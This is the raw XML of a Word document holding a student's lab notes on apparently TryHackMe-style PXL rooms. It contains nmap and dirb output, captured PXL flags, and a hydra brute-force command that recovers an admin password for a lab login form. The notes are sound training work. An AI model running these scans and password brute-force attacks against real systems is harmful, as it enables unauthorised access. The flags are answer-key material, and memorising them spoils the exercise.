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CEF8" w14:textId="2208470F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 xml:space="preserve">Resultaten CHapter 4 try hack me rooms </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DD7BA3" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00770F0E" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C8B2EC7" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00770F0E" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297E72F2" w14:textId="18DCE00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Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-07 04:04 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730C8667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Nmap scan report for 10.114.70.239</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428D0B1D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Host is up (0.033s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F02E61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Not shown: 996 closed tcp ports (reset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143006B9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PORT     STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117EA5A0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22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A4AA5D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| ssh-hostkey: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42289750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|   256 f5:53:49:00:b1:b9:fa:2a:e8:33:31:2d:d0:67:aa:79 (ECDSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A41B6A0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|_  256 8f:fc:cd:b5:3b:b2:72:a8:53:0b:9d:29:9e:a9:84:df (ED25519)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3607D471" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>80/tcp   open  http    nginx 1.27.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656DD55B" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>|_http-title: Blog Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419EE9E3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|_http-server-header: nginx/1.27.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F7D8A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3000/tcp open  http    Node.js Express framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFFC2F8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|_http-cors: GET POST PUT DELETE PATCH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E76188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|_http-title: SeclabTemp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02959C84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8080/tcp open  http    Apache httpd 2.4.54 ((Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A21C0A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|_http-server-header: Apache/2.4.54 (Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A8C4B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|_http-open-proxy: Proxy might be redirecting requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6384EFDD" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00770F0E" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
        <w:t>|_http-title: PXL intranet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF2CA39" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00770F0E" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6644DDD9" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00770F0E" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AFFB275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Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E3089" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00770F0E" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap done: 1 IP address (1 host up) scanned in 19.01 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2448BF54" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00770F0E" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E980625" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="00626211" w:rsidP="007B5482">
      <w:r w:rsidRPr="00626211">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2 de deel vragen </w:t>
      </w:r>
      <w:r w:rsidRPr="00626211">
        <w:br/>
      </w:r>
      <w:r w:rsidR="007B5482">
        <w:t>┌──(kali</w:t>
      </w:r>
      <w:r w:rsidR="007B5482">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidR="007B5482">
        <w:t>kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793084F7" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>└─$ dirb http://10.114.70.239 /usr/share/wordlists/dirb/common.txt -X .php,.txt,.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5569FB87" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE3575D" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759B6525" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DIRB v2.22    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65843EE4" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By The Dark Raver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6D93D0" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCC4405" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5A22CC" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>START_TIME: Tue Apr  7 04:37:49 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5C1AD" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL_BASE: http://10.114.70.239/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1513F453" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3990CBE6" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXTENSIONS_LIST: (.php,.txt,.html) | (.php)(.txt)(.html) [NUM = 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB15CB" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAFBB0E" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A7C54E" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36491B2D" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">GENERATED WORDS: 4612                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA45F05" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DE1C35" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>---- Scanning URL: http://10.114.70.239/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ECEB7C" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">+ http://10.114.70.239/administrator.html (CODE:200|SIZE:48)                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10129970" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">+ http://10.114.70.239/index.html (CODE:200|SIZE:2665)                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349529AA" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">+ http://10.114.70.239/robots.txt (CODE:200|SIZE:39)                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596C3FA4" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="fr-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D24B19" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2697D3BA" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>END_TIME: Tue Apr  7 04:45:20 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A251A6" w14:textId="77777777" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DOWNLOADED: 13836 - FOUND: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128194A3" w14:textId="5323274B" w:rsidR="00626211" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                      </w:t>
      </w:r>
      <w:r w:rsidR="00626211" w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102FE465" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00770F0E" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435635DF" w14:textId="18A2CE29" w:rsidR="007B5482" w:rsidRPr="00770F0E" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">eerste flag = </w:t>
      </w:r>
      <w:r w:rsidR="007B5482" w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PXL{9eebb49d33499a8f0d952ca80c79099e}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1859B7FF" w14:textId="22FA6ED5" w:rsidR="00626211" w:rsidRPr="00770F0E" w:rsidRDefault="007B5482" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tweede flag = </w:t>
      </w:r>
      <w:r w:rsidR="00626211" w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PXL{6423cefb17bbcb5e9267499ade46ff46}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB6CEF" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6E04E2" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322148CB" w14:textId="2E5CDE9F" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tast 3 bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26547010" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>┌──(kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105BD162" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:r>
        <w:t>└─$ hydra -l admin -P ~/passwords.txt 10.114.70.239 -s 8080 http-post-form "/index.php:gebruiker=^USER^&amp;wachtwoord=^PASS^:F=Invalid password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7C5F97" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hydra v9.6 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176BE62B" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2169CFF2" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-04-07 05:15:05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B45F6" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[DATA] max 16 tasks per 1 server, overall 16 tasks, 283 login tries (l:1/p:283), ~18 tries per task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97E069" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[DATA] attacking http-post-form://10.114.70.239:8080/index.php:gebruiker=^USER^&amp;wachtwoord=^PASS^:F=Invalid password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5088E14D" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">[8080][http-post-form] host: 10.114.70.239   </w:t>
      </w:r>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>login: admin   password: purple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3839EA" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 of 1 target successfully completed, 1 valid password found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DE0DA8" w14:textId="3E1291E9" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-04-07 05:15:13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33355397" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32626EEF" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00D343B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag 1 = PXL{6859d319aaf360047dd4495092230026}</w:t>
      </w:r>
      <w:r w:rsidR="00D343B8" w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D343B8" w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB44C46" w14:textId="47986654" w:rsidR="00D343B8" w:rsidRPr="00770F0E" w:rsidRDefault="00D343B8" w:rsidP="00D343B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Welcome admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF241F" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRPr="00770F0E" w:rsidRDefault="00D343B8" w:rsidP="00D343B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PXL{6859d319aaf360047dd4495092230026}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C799B7E" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRPr="00770F0E" w:rsidRDefault="00D343B8" w:rsidP="00D343B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204F0FA3" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRPr="00770F0E" w:rsidRDefault="00D343B8" w:rsidP="00D343B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    Real Name: John Doe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1417920C" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRPr="00770F0E" w:rsidRDefault="00D343B8" w:rsidP="00D343B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    Address: Elfde-liniestraat 124 Hasselt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674A81D1" w14:textId="7FCB6693" w:rsidR="00D343B8" w:rsidRPr="00770F0E" w:rsidRDefault="00D343B8" w:rsidP="00D343B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Email: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00C3371B" w:rsidRPr="00770F0E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
